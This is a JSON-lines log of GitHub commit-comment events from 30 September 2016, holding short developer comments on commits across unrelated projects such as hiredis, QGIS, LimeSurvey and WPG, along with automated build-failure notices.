{"id":"4641938602","type":"CommitCommentEvent","actor":{"login":"CFGrote"},"repo":{"name":"samoylv/WPG"},"payload":{"comment":{"id":19237439,"position":null,"line":null,"path":null,"commit_id":"9f5fd356a1fae583016d26c8d220bc26a2689f2b","created_at":"2016-09-30T07:43:21Z","updated_at":"2016-09-30T07:43:21Z","body":"can we use an earlier commit in simex (where this issue is not present)?"}},"created_at":"2016-09-30T07:43:21Z"}
{"id":"4641939595","type":"CommitCommentEvent","actor":{"login":"CFGrote"},"repo":{"name":"samoylv/WPG"},"payload":{"comment":{"id":19237441,"position":null,"line":null,"path":null,"commit_id":"9f5fd356a1fae583016d26c8d220bc26a2689f2b","created_at":"2016-09-30T07:43:37Z","updated_at":"2016-09-30T07:43:37Z","body":"wpg needs unittests!!"}},"created_at":"2016-09-30T07:43:37Z"}
{"id":"4641943916","type":"CommitCommentEvent","actor":{"login":"batmat"},"repo":{"name":"jenkins-infra/jenkins-infra"},"payload":{"comment":{"id":19237446,"position":null,"line":null,"path":null,"commit_id":"1d34267302273682b861569caaa2f3df5b0172b7","created_at":"2016-09-30T07:44:31Z","updated_at":"2016-09-30T07:44:31Z","body":"![](https://media.giphy.com/media/H1s8PfRv9p41a/giphy.gif) @rtyler "}},"created_at":"2016-09-30T07:44:31Z"}
{"id":"4641949909","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"safwank/toniq"},"payload":{"comment":{"id":19237459,"position":null,"line":null,"path":null,"commit_id":"c09a51f7a47d9a695d23aafde70eeb818d2f2173","created_at":"2016-09-30T07:45:51Z","updated_at":"2016-09-30T07:45:51Z","body":"If you want delayed jobs to be run the instant they are due you could have one process that tracks each or use `Process.send_after` with the job specific arguments, e.g. `Process.send_after(self(), {:flush_job, job}, job.delayed_until - :os.system_time(:milli_seconds))`.\r\n\r\nWhen the importer gets that message it could  import them like this https://github.com/joakimk/toniq/blob/master/lib/toniq/job_importer.ex#L36. It's okay to enqueue and then remove the job from delayed jobs since Toniq has an underlying assumption that jobs are allowed to run more than once if anything fails, but never be lost."}},"created_at":"2016-09-30T07:45:51Z"}
{"id":"4641950493","type":"CommitCommentEvent","actor":{"login":"erikdubbelboer"},"repo":{"name":"redis/hiredis"},"payload":{"comment":{"id":19237461,"position":21,"line":21,"path":"adapters/libuv.h","commit_id":"61277d09251cfef4f768ea5d263145248e2c3a83","created_at":"2016-09-30T07:45:58Z","updated_at":"2016-09-30T07:45:58Z","body":"I'm pretty sure redisAsyncFree is wrong. In theory we should tell hiredis some error event happened but there is no way to do this."}},"created_at":"2016-09-30T07:45:58Z"}
{"id":"4641953149","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-drag-question"},"payload":{"comment":{"id":19237467,"position":126,"line":1377,"path":"js/dragquestion.js","commit_id":"11609b66118e85776895d9266ca5417695b842af","created_at":"2016-09-30T07:46:34Z","updated_at":"2016-09-30T07:46:34Z","body":"Draggables are only added to self.draggables array if draggables are auto-aligned ? I think the variable name of the array should be more descriptive"}},"created_at":"2016-09-30T07:46:34Z"}
{"id":"4641953685","type":"CommitCommentEvent","actor":{"login":"lqdung-lockon"},"repo":{"name":"eccubevn/ec-cube"},"payload":{"comment":{"id":19237468,"position":4,"line":3253,"path":"html/template/default/css/style.css","commit_id":"eef86ef72ea7fb759d8205b1e05c8157192730d0","created_at":"2016-09-30T07:46:41Z","updated_at":"2016-09-30T07:46:41Z","body":"Okey. This is my mistake! Sorry for this...\r\n"}},"created_at":"2016-09-30T07:46:41Z"}
{"id":"4641954496","type":"CommitCommentEvent","actor":{"login":"praveenalaxmi1"},"repo":{"name":"praveenalaxmi1/HelloWorld"},"payload":{"comment":{"id":19237469,"position":null,"line":null,"path":null,"commit_id":"b36ea5e388932456d5893402d31f74a17551e26d","created_at":"2016-09-30T07:46:52Z","updated_at":"2016-09-30T07:46:52Z","body":"hai"}},"created_at":"2016-09-30T07:46:52Z"}
{"id":"4641957448","type":"CommitCommentEvent","actor":{"login":"Kotolegokot"},"repo":{"name":"Kotolegokot/PlaneRunner"},"payload":{"comment":{"id":19237478,"position":30,"line":60,"path":"include/IBody.h","commit_id":"f9b13a4ee0b10bb501d49e2bcb252e0fb33acc00","created_at":"2016-09-30T07:47:43Z","updated_at":"2016-09-30T07:47:43Z","body":"рукалицо"}},"created_at":"2016-09-30T07:47:43Z"}
{"id":"4641957974","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"jacob4684/Polymorphism"},"payload":{"comment":{"id":19237480,"position":5,"line":61,"path":"PersonPolymorphism/Person.cs","commit_id":"2770add6d9bfedc4425c6f5c55ee34d80307d6f1","created_at":"2016-09-30T07:47:51Z","updated_at":"2016-09-30T07:47:51Z","body":"Fint - og godt med RegEx. \r\nMetoden mangler at være static og public. Og når du har gjort det, så skal du overveje at tilføje en ny parameter, som er det ssn der skal valideres på - ellers opstår der red squiggly lines."}},"created_at":"2016-09-30T07:47:51Z"}
{"id":"4641958904","type":"CommitCommentEvent","actor":{"login":"saudet"},"repo":{"name":"bytedeco/javacpp-presets"},"payload":{"comment":{"id":19237484,"position":null,"line":null,"path":null,"commit_id":"922299a4dbdd148c5b8f142209afab84b811a991","created_at":"2016-09-30T07:48:06Z","updated_at":"2016-09-30T07:48:06Z","body":"Do you actually need to use libdc1394?"}},"created_at":"2016-09-30T07:48:06Z"}
{"id":"4641959767","type":"CommitCommentEvent","actor":{"login":"hefayou"},"repo":{"name":"YZMobileTalks/WX_YZNode"},"payload":{"comment":{"id":19237486,"position":9,"line":9,"path":"demo/HomePage/Home.js","commit_id":"c6e40483109308362a3ec698f0bb61971426ef43","created_at":"2016-09-30T07:48:19Z","updated_at":"2016-09-30T07:48:19Z","body":"dasasd"}},"created_at":"2016-09-30T07:48:19Z"}
{"id":"4641967248","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19237505,"position":null,"line":null,"path":null,"commit_id":"bebf50af5121fd17602c3752051983bb690b4637","created_at":"2016-09-30T07:50:14Z","updated_at":"2016-09-30T07:50:14Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/33723/testReport/) for this commit**"}},"created_at":"2016-09-30T07:50:14Z"}
{"id":"4641968469","type":"CommitCommentEvent","actor":{"login":"betzholz"},"repo":{"name":"twigphp/Twig"},"payload":{"comment":{"id":19237508,"position":null,"line":null,"path":null,"commit_id":"91d2adc0616ada818caa2e914851832112f55e26","created_at":"2016-09-30T07:50:33Z","updated_at":"2016-09-30T07:50:33Z","body":"Works for me on Ubuntu and Windows systems! THX"}},"created_at":"2016-09-30T07:50:33Z"}
{"id":"4641968581","type":"CommitCommentEvent","actor":{"login":"lostiniceland"},"repo":{"name":"ops4j/org.ops4j.pax.cdi"},"payload":{"comment":{"id":19237509,"position":null,"line":null,"path":null,"commit_id":"0de74ad120e3d0f8ba02b174d7d24420291cb3ae","created_at":"2016-09-30T07:50:35Z","updated_at":"2016-09-30T07:50:35Z","body":"I've included pax-web 6 in the range. \r\n\r\nI've also repaired the Jenkins-job since Pax-CDI uses JDK 8 and the default in Jenkins is still 6 or 7."}},"created_at":"2016-09-30T07:50:35Z"}
{"id":"4641973425","type":"CommitCommentEvent","actor":{"login":"danielwegener"},"repo":{"name":"fabric8io/docker-maven-plugin"},"payload":{"comment":{"id":19237519,"position":32,"line":106,"path":"src/main/java/io/fabric8/maven/docker/access/log/LogRequestor.java","commit_id":"bb7c6022dec7330479e09d86f99acd51f4cedc81","created_at":"2016-09-30T07:51:46Z","updated_at":"2016-09-30T07:51:46Z","body":"@rhuss I think this close somewhat introduced a (weird concurrency) bug that causes the log-listeners to try to abort a request while the client is already closed (in `io/fabric8/maven/docker/access/log/LogRequestor.java:215`). This somewhat causes `org/apache/httpcomponents/httpclient/4.5.2/httpclient-4.5.2-sources.jar!/org/apache/http/impl/conn/BasicHttpClientConnectionManager.java:286` to have its internal connection already set to `null` when the connection is attempted to be aborted and throw an `IllegalStateException(\"Connection not obtained from this manager\")`. A workaround would be to let `io.fabric8.maven.docker.access.hc.http.HttpClientBuilder#buildBasicClient` use `.setConnectionManagerShared(true)` (i.E. the connection Manager is left unclosed if a connection is closed) but this seem to produce an undesired resource leak.\r\nI'll try to investigate further this weekend. "}},"created_at":"2016-09-30T07:51:46Z"}
{"id":"4641973505","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":19237520,"position":null,"line":null,"path":null,"commit_id":"930a95eb1f0258cc91b20a5f997f5b5f52e1faca","created_at":"2016-09-30T07:51:48Z","updated_at":"2016-09-30T07:51:48Z","body":"need to find someone.... but there is no harm in keeping this atleast it avoids the error of HDR mode"}},"created_at":"2016-09-30T07:51:48Z"}
{"id":"4641974528","type":"CommitCommentEvent","actor":{"login":"mrpeny"},"repo":{"name":"mrpeny/walmagERP"},"payload":{"comment":{"id":19237525,"position":null,"line":null,"path":null,"commit_id":"37175942a56af57fda23b699f976cf5a3d637ac8","created_at":"2016-09-30T07:52:03Z","updated_at":"2016-09-30T07:52:03Z","body":"Hello @icce-p !\r\n\r\nI've tried to make the load() methods of Loader classes static but I faced the problem that in this case WalmagLodaer interface should define the `load()` method as static as well. This makes things complicated because then load() must have a method body in the interface and cannot reference Entity type variable.\r\n\r\nI see 2 solutions:\r\n1. We keep loaders working as objects as they are in my last commit.\r\n2. We don't use interface.\r\n\r\nOr is there another solution combining static method in the interface and overriding static methotds in the implementing classes?"}},"created_at":"2016-09-30T07:52:03Z"}
{"id":"4641976191","type":"CommitCommentEvent","actor":{"login":"wenerme"},"repo":{"name":"bytedeco/javacpp-presets"},"payload":{"comment":{"id":19237531,"position":null,"line":null,"path":null,"commit_id":"922299a4dbdd148c5b8f142209afab84b811a991","created_at":"2016-09-30T07:52:28Z","updated_at":"2016-09-30T07:52:28Z","body":"I follow the demo in https://github.com/bytedeco/javacv , this demo require libdc1394. I'm new to this, I don't know how to get rid of this, just want to run a demo."}},"created_at":"2016-09-30T07:52:28Z"}
{"id":"4641976303","type":"CommitCommentEvent","actor":{"login":"L0FKA"},"repo":{"name":"rscustom/rocksmith-custom-song-toolkit"},"payload":{"comment":{"id":19237533,"position":2,"line":1,"path":"VersionInfo.txt","commit_id":"494877f8d3b4c3238c4d140f55e20af1302d2050","created_at":"2016-09-30T07:52:30Z","updated_at":"2016-09-30T07:52:30Z","body":"Should we gitignotr this and keep it to Zeroes x8 ??"}},"created_at":"2016-09-30T07:52:30Z"}
{"id":"4641980063","type":"CommitCommentEvent","actor":{"login":"chriskuehl"},"repo":{"name":"ocf/puppet"},"payload":{"comment":{"id":19237538,"position":14,"line":13,"path":"modules/ocf/files/puppet-trigger","commit_id":"4909f76946b77d5aa020ede13556e44e9634317b","created_at":"2016-09-30T07:53:31Z","updated_at":"2016-09-30T07:53:31Z","body":"this is necessary on python3 (but not python2) because of poor design decisions wrt buffering of stdout/stderr by default :\\"}},"created_at":"2016-09-30T07:53:31Z"}
{"id":"4641982187","type":"CommitCommentEvent","actor":{"login":"L0FKA"},"repo":{"name":"rscustom/rocksmith-custom-song-toolkit"},"payload":{"comment":{"id":19237545,"position":22,"line":323,"path":"RocksmithTookitGUI/DLCInlayCreator/DLCInlayCreator.cs","commit_id":"a49c23221908b900c8d250ec00dfaeb407be1a33","created_at":"2016-09-30T07:54:07Z","updated_at":"2016-09-30T07:54:07Z","body":"extra space is damn good! :D"}},"created_at":"2016-09-30T07:54:07Z"}
{"id":"4641983698","type":"CommitCommentEvent","actor":{"login":"SergeyYakubov"},"repo":{"name":"samoylv/WPG"},"payload":{"comment":{"id":19237548,"position":null,"line":null,"path":null,"commit_id":"9f5fd356a1fae583016d26c8d220bc26a2689f2b","created_at":"2016-09-30T07:54:32Z","updated_at":"2016-09-30T07:54:32Z","body":"> \r\ncan we use an earlier commit in simex (where this issue is not present)?\r\n> \r\nI think this time it's easier to correct this bug and then think of a more general solution. "}},"created_at":"2016-09-30T07:54:32Z"}
{"id":"4641987911","type":"CommitCommentEvent","actor":{"login":"SindhuGSpatil"},"repo":{"name":"snehakasetty224/S3TVirus"},"payload":{"comment":{"id":19237556,"position":null,"line":null,"path":null,"commit_id":"c2c280951db4f8059b38f4388676684a22264d79","created_at":"2016-09-30T07:55:40Z","updated_at":"2016-09-30T07:55:40Z","body":"updated one"}},"created_at":"2016-09-30T07:55:40Z"}
{"id":"4641989008","type":"CommitCommentEvent","actor":{"login":"nirvn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19237560,"position":null,"line":null,"path":null,"commit_id":"a21946abd9359ed56566d597c7e88cdc6bb356a8","created_at":"2016-09-30T07:55:58Z","updated_at":"2016-09-30T07:55:58Z","body":"@fritsvanveen , @nyalldawson , a regression slipped in master with regards to curved labels, see this issue (http://hub.qgis.org/issues/15639) and the video showcasing the problem (http://hub.qgis.org/attachments/10423/curved_bug.mp4)"}},"created_at":"2016-09-30T07:55:58Z"}
{"id":"4641989160","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19237561,"position":null,"line":null,"path":null,"commit_id":"9074b117d4c0e3575ae5c83e72f67de291aa572d","created_at":"2016-09-30T07:56:01Z","updated_at":"2016-09-30T07:56:01Z","body":"卧槽。我怎么没想过这个。\r\n\r\n吼啊。坠吼弄个AutoGC，超过屏幕一倍的就直接从数组中删除。 😂  我就是这么做的。然后这个得有个开关。"}},"created_at":"2016-09-30T07:56:01Z"}
{"id":"4641989627","type":"CommitCommentEvent","actor":{"login":"L0FKA"},"repo":{"name":"rscustom/rocksmith-custom-song-toolkit"},"payload":{"comment":{"id":19237562,"position":4,"line":315,"path":"RocksmithTookitGUI/RocksmithToolkitGUI.csproj","commit_id":"a49c23221908b900c8d250ec00dfaeb407be1a33","created_at":"2016-09-30T07:56:09Z","updated_at":"2016-09-30T07:56:09Z","body":"trash? or rstklib really should have one.."}},"created_at":"2016-09-30T07:56:09Z"}
{"id":"4641990417","type":"CommitCommentEvent","actor":{"login":"pysailor"},"repo":{"name":"plone/plone.patternslib"},"payload":{"comment":{"id":19237564,"position":null,"line":null,"path":null,"commit_id":"609d34aaf5768bfa5b931da2587edab186a91db4","created_at":"2016-09-30T07:56:21Z","updated_at":"2016-09-30T07:56:21Z","body":"I needed that to be able to build (run `make bundle` in src/plone/patternslib/static/components/patternslib\r\nBut at the moment, @pilz and me are re-working the whole structure anyway, so this will change. I'll open a ticket that explains our intentions."}},"created_at":"2016-09-30T07:56:21Z"}
{"id":"4641990542","type":"CommitCommentEvent","actor":{"login":"Spajetti-o"},"repo":{"name":"Spajetti-o/spagbowl"},"payload":{"comment":{"id":19237565,"position":1,"line":1,"path":"README.md","commit_id":"2cd3a6a7ee90e78ac927fc43e9bb4a1064e562f3","created_at":"2016-09-30T07:56:23Z","updated_at":"2016-09-30T07:56:23Z","body":"pppppp"}},"created_at":"2016-09-30T07:56:23Z"}
{"id":"4641998243","type":"CommitCommentEvent","actor":{"login":"Amrit-Jaiswal"},"repo":{"name":"Amrit-Jaiswal/RBC"},"payload":{"comment":{"id":19237576,"position":null,"line":null,"path":null,"commit_id":"a3f8f935360a23017e83b21da993d8a34bca70a3","created_at":"2016-09-30T07:58:23Z","updated_at":"2016-09-30T07:58:23Z","body":"refactoring"}},"created_at":"2016-09-30T07:58:23Z"}
{"id":"4641998882","type":"CommitCommentEvent","actor":{"login":"L0FKA"},"repo":{"name":"rscustom/rocksmith-custom-song-toolkit"},"payload":{"comment":{"id":19237577,"position":17,"line":30,"path":"RocksmithToolkitCLI/artistfolders/Program.cs","commit_id":"a49c23221908b900c8d250ec00dfaeb407be1a33","created_at":"2016-09-30T07:58:33Z","updated_at":"2016-09-30T07:58:33Z","body":"license is missing, so we can only copywrite here :DD"}},"created_at":"2016-09-30T07:58:33Z"}
{"id":"4641999481","type":"CommitCommentEvent","actor":{"login":"ezyang"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":19237578,"position":null,"line":null,"path":null,"commit_id":"bb2026c4dd6238338cfbcc4a34e3fa1f6868dc13","created_at":"2016-09-30T07:58:43Z","updated_at":"2016-09-30T07:58:43Z","body":"NB: This commit breaks the \"globVersion\" hack in ghc-pkg, where a star is stuffed in Version to simulate version globs."}},"created_at":"2016-09-30T07:58:43Z"}
{"id":"4642004136","type":"CommitCommentEvent","actor":{"login":"CFGrote"},"repo":{"name":"samoylv/WPG"},"payload":{"comment":{"id":19237587,"position":null,"line":null,"path":null,"commit_id":"9f5fd356a1fae583016d26c8d220bc26a2689f2b","created_at":"2016-09-30T07:59:57Z","updated_at":"2016-09-30T07:59:57Z","body":"sure, fine with me.\n\nOn 09/30/2016 09:54 AM, SergeyYakubov wrote:\n>     can we use an earlier commit in simex (where this issue is not present)?\n> \n>     I think this time it's easier to correct this bug and then think of\n>     a more general solution.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/samoylv/WPG/commit/9f5fd356a1fae583016d26c8d220bc26a2689f2b#commitcomment-19237548>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AOwoR1xC7rtwfwxPsgbnTimx1-1WQXcdks5qvMA4gaJpZM4KKzmo>.\n> \n\n-- \nDr. Carsten Fortmann-Grote\nScientist for Scientific Simulations / Wissenschaftler fuer\nwissenschaftliche Simulationen\nEuropean XFEL GmbH\nHolzkoppel 4\n22869 Schenefeld\nGermany\n\nPhone: +49 (0)40 8998-5603\nFax:   +49 (0)40 8998-1905\nEmail: carsten.grote@xfel.eu\nWeb: www.xfel.eu\n\nManaging Directors: Prof. Dr. Massimo Altarelli, Dr. Claudia Burger\n\nRegistered as European X-Ray Free-Electron Laser Facility GmbH\nat Amtsgericht Hamburg, HRB 111165\n\n"}},"created_at":"2016-09-30T07:59:57Z"}
{"id":"4642004174","type":"CommitCommentEvent","actor":{"login":"rofrol"},"repo":{"name":"evancz/guide.elm-lang.org"},"payload":{"comment":{"id":19237588,"position":null,"line":null,"path":null,"commit_id":"d0f8a7396cf0c95989ac0974d92dafcd6fa72ba4","created_at":"2016-09-30T07:59:58Z","updated_at":"2016-09-30T07:59:58Z","body":"Diagrams not readable when using Dark Reader https://chrome.google.com/webstore/detail/dark-reader/eimadpbcbfnmbkopoojfekhnkhdbieeh"}},"created_at":"2016-09-30T07:59:58Z"}
{"id":"4642004247","type":"CommitCommentEvent","actor":{"login":"lqdung-lockon"},"repo":{"name":"eccubevn/ec-cube"},"payload":{"comment":{"id":19237590,"position":30,"line":95,"path":"tests/Eccube/Tests/Web/CartValidationTest.php","commit_id":"5a788a54b7934704c7d58a983c390c29d8727d40","created_at":"2016-09-30T07:59:59Z","updated_at":"2016-09-30T07:59:59Z","body":"Can not get form because it use javascrits to submit form."}},"created_at":"2016-09-30T07:59:59Z"}
{"id":"4642005741","type":"CommitCommentEvent","actor":{"login":"passy"},"repo":{"name":"amsharma91/awesome"},"payload":{"comment":{"id":19237595,"position":null,"line":null,"path":null,"commit_id":"345521a6ffca2648ed89ca01ccca5100eb279bed","created_at":"2016-09-30T08:00:19Z","updated_at":"2016-09-30T08:00:19Z","body":"\\o/"}},"created_at":"2016-09-30T08:00:19Z"}
{"id":"4642006382","type":"CommitCommentEvent","actor":{"login":"lammn"},"repo":{"name":"cubevn/mail-magazine-plugin"},"payload":{"comment":{"id":19237597,"position":null,"line":null,"path":null,"commit_id":"4548c35841d446ae249f3b87a8b55a645f9ca531","created_at":"2016-09-30T08:00:27Z","updated_at":"2016-09-30T08:00:27Z","body":"Ok thank you i will fix it"}},"created_at":"2016-09-30T08:00:27Z"}
{"id":"4642007512","type":"CommitCommentEvent","actor":{"login":"CFGrote"},"repo":{"name":"samoylv/WPG"},"payload":{"comment":{"id":19237602,"position":null,"line":null,"path":null,"commit_id":"9f5fd356a1fae583016d26c8d220bc26a2689f2b","created_at":"2016-09-30T08:00:44Z","updated_at":"2016-09-30T08:00:44Z","body":"fine with me. i mean this as a general solution. fix the bug and then\nhardwire to the fixing commit in simex.\n\nOn 09/30/2016 09:54 AM, SergeyYakubov wrote:\n>     can we use an earlier commit in simex (where this issue is not present)?\n> \n>     I think this time it's easier to correct this bug and then think of\n>     a more general solution.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/samoylv/WPG/commit/9f5fd356a1fae583016d26c8d220bc26a2689f2b#commitcomment-19237548>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AOwoR1xC7rtwfwxPsgbnTimx1-1WQXcdks5qvMA4gaJpZM4KKzmo>.\n> \n\n-- \nDr. Carsten Fortmann-Grote\nScientist for Scientific Simulations / Wissenschaftler fuer\nwissenschaftliche Simulationen\nEuropean XFEL GmbH\nHolzkoppel 4\n22869 Schenefeld\nGermany\n\nPhone: +49 (0)40 8998-5603\nFax:   +49 (0)40 8998-1905\nEmail: carsten.grote@xfel.eu\nWeb: www.xfel.eu\n\nManaging Directors: Prof. Dr. Massimo Altarelli, Dr. Claudia Burger\n\nRegistered as European X-Ray Free-Electron Laser Facility GmbH\nat Amtsgericht Hamburg, HRB 111165\n\n"}},"created_at":"2016-09-30T08:00:44Z"}
{"id":"4642012277","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19237608,"position":15,"line":159,"path":"application/controllers/AdminController.php","commit_id":"a562549ee8d155004dfc0ad4bbffe79928fe5cc4","created_at":"2016-09-30T08:01:56Z","updated_at":"2016-09-30T08:01:56Z","body":"You did this already?"}},"created_at":"2016-09-30T08:01:56Z"}
{"id":"4642012495","type":"CommitCommentEvent","actor":{"login":"L0FKA"},"repo":{"name":"rscustom/rocksmith-custom-song-toolkit"},"payload":{"comment":{"id":19237609,"position":null,"line":null,"path":null,"commit_id":"a49c23221908b900c8d250ec00dfaeb407be1a33","created_at":"2016-09-30T08:01:59Z","updated_at":"2016-09-30T08:01:59Z","body":"More symb-freedom thank you."}},"created_at":"2016-09-30T08:01:59Z"}
{"id":"4642015585","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19237617,"position":15,"line":159,"path":"application/controllers/AdminController.php","commit_id":"a562549ee8d155004dfc0ad4bbffe79928fe5cc4","created_at":"2016-09-30T08:02:44Z","updated_at":"2016-09-30T08:02:44Z","body":"Good idea."}},"created_at":"2016-09-30T08:02:44Z"}
{"id":"4642016560","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19237622,"position":15,"line":159,"path":"application/controllers/AdminController.php","commit_id":"a562549ee8d155004dfc0ad4bbffe79928fe5cc4","created_at":"2016-09-30T08:02:59Z","updated_at":"2016-09-30T08:02:59Z","body":"yes (see the link of the commit)"}},"created_at":"2016-09-30T08:02:59Z"}
{"id":"4642018404","type":"CommitCommentEvent","actor":{"login":"RLumSK"},"repo":{"name":"R-Lum/Luminescence"},"payload":{"comment":{"id":19237626,"position":null,"line":null,"path":null,"commit_id":"5d09c5af2f981acaf5005cb7d70a261663b96f0e","created_at":"2016-09-30T08:03:29Z","updated_at":"2016-09-30T08:03:29Z","body":"D'accord!"}},"created_at":"2016-09-30T08:03:29Z"}
{"id":"4642019399","type":"CommitCommentEvent","actor":{"login":"oska874"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":19237628,"position":null,"line":null,"path":null,"commit_id":"586c4d8ebb496445012a6ebe9c294822a1d5337a","created_at":"2016-09-30T08:03:45Z","updated_at":"2016-09-30T08:03:45Z","body":"@wxy 告诉你了，我们这可是藏龙卧虎  @ucasFL "}},"created_at":"2016-09-30T08:03:45Z"}
{"id":"4642019657","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19237629,"position":null,"line":null,"path":null,"commit_id":"06e4eaa7d58c02602773ae93611798cc1b0c0876","created_at":"2016-09-30T08:03:49Z","updated_at":"2016-09-30T08:03:49Z","body":"Close: https://github.com/ant-design/ant-design/issues/3247"}},"created_at":"2016-09-30T08:03:49Z"}
{"id":"4642019854","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19237631,"position":15,"line":159,"path":"application/controllers/AdminController.php","commit_id":"a562549ee8d155004dfc0ad4bbffe79928fe5cc4","created_at":"2016-09-30T08:03:52Z","updated_at":"2016-09-30T08:03:52Z","body":"but here : must be `\\ls\\helpers\\admin\\AjaxHelper::outputNotLoggedIn()` ?"}},"created_at":"2016-09-30T08:03:52Z"}
{"id":"4642021211","type":"CommitCommentEvent","actor":{"login":"SergeyYakubov"},"repo":{"name":"samoylv/WPG"},"payload":{"comment":{"id":19237632,"position":null,"line":null,"path":null,"commit_id":"9f5fd356a1fae583016d26c8d220bc26a2689f2b","created_at":"2016-09-30T08:04:12Z","updated_at":"2016-09-30T08:04:12Z","body":"better would be fix bug, create a release with some number and comments, and then hardwire to this release "}},"created_at":"2016-09-30T08:04:12Z"}
{"id":"4642024048","type":"CommitCommentEvent","actor":{"login":"saudet"},"repo":{"name":"bytedeco/javacpp-presets"},"payload":{"comment":{"id":19237637,"position":null,"line":null,"path":null,"commit_id":"922299a4dbdd148c5b8f142209afab84b811a991","created_at":"2016-09-30T08:04:57Z","updated_at":"2016-09-30T08:04:57Z","body":"It doesn't required libdc1394, you can safely ignore the error message."}},"created_at":"2016-09-30T08:04:57Z"}
{"id":"4642026376","type":"CommitCommentEvent","actor":{"login":"staltz"},"repo":{"name":"cyclejs/cyclejs"},"payload":{"comment":{"id":19237644,"position":6,"line":55,"path":"dom/src/makeDOMDriver.ts","commit_id":"c91e7c619feb187f9aed5665d291babdd896d078","created_at":"2016-09-30T08:05:29Z","updated_at":"2016-09-30T08:05:29Z","body":"Hmm, not sure."}},"created_at":"2016-09-30T08:05:29Z"}
{"id":"4642027426","type":"CommitCommentEvent","actor":{"login":"BigWavelet"},"repo":{"name":"openatx/go-stf"},"payload":{"comment":{"id":19237648,"position":169,"line":169,"path":"rotation.go","commit_id":"63e418f3af214373f1eb7a364664a39e84b6b18c","created_at":"2016-09-30T08:05:46Z","updated_at":"2016-09-30T08:05:46Z","body":"xx := \"/data/local/tmp/RotationWatcher.apk\"?"}},"created_at":"2016-09-30T08:05:46Z"}
{"id":"4642030354","type":"CommitCommentEvent","actor":{"login":"NuclearCoder"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19237656,"position":12,"line":0,"path":"sources/main.c","commit_id":"f492effe91d2dc30b54d4aef5cda425f77ebbaa8","created_at":"2016-09-30T08:06:32Z","updated_at":"2016-09-30T08:06:32Z","body":"lol, okay xD"}},"created_at":"2016-09-30T08:06:32Z"}
{"id":"4642030558","type":"CommitCommentEvent","actor":{"login":"BigWavelet"},"repo":{"name":"openatx/go-stf"},"payload":{"comment":{"id":19237658,"position":175,"line":175,"path":"rotation.go","commit_id":"63e418f3af214373f1eb7a364664a39e84b6b18c","created_at":"2016-09-30T08:06:35Z","updated_at":"2016-09-30T08:06:35Z","body":"name参数还是没有用？"}},"created_at":"2016-09-30T08:06:35Z"}
{"id":"4642031095","type":"CommitCommentEvent","actor":{"login":"DGYao"},"repo":{"name":"DGYao/Hello-World"},"payload":{"comment":{"id":19237660,"position":1,"line":1,"path":"ReadMe.txt","commit_id":"d613c64c4daa5cbe75f44a7470f9f217cd678cb5","created_at":"2016-09-30T08:06:44Z","updated_at":"2016-09-30T08:06:44Z","body":"edit1"}},"created_at":"2016-09-30T08:06:44Z"}
{"id":"4642032498","type":"CommitCommentEvent","actor":{"login":"andyWqh"},"repo":{"name":"andyWqh/andyWqhProjects"},"payload":{"comment":{"id":19237662,"position":null,"line":null,"path":null,"commit_id":"716e87c135c4ea326001d3444bbfa712747d4500","created_at":"2016-09-30T08:07:06Z","updated_at":"2016-09-30T08:07:06Z","body":"test create branch and commit changes "}},"created_at":"2016-09-30T08:07:06Z"}
{"id":"4642033205","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19237663,"position":15,"line":159,"path":"application/controllers/AdminController.php","commit_id":"a562549ee8d155004dfc0ad4bbffe79928fe5cc4","created_at":"2016-09-30T08:07:16Z","updated_at":"2016-09-30T08:07:16Z","body":"Hm, I guess."}},"created_at":"2016-09-30T08:07:16Z"}
{"id":"4642039808","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19237674,"position":null,"line":null,"path":null,"commit_id":"3c3dc0caff8512d3d93211ecb83857c7d2603b58","created_at":"2016-09-30T08:08:58Z","updated_at":"2016-09-30T08:08:58Z","body":"input_processor_refactor (mbadams5) - Win64-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-50.53%25-red.svg)</a> \n"}},"created_at":"2016-09-30T08:08:58Z"}
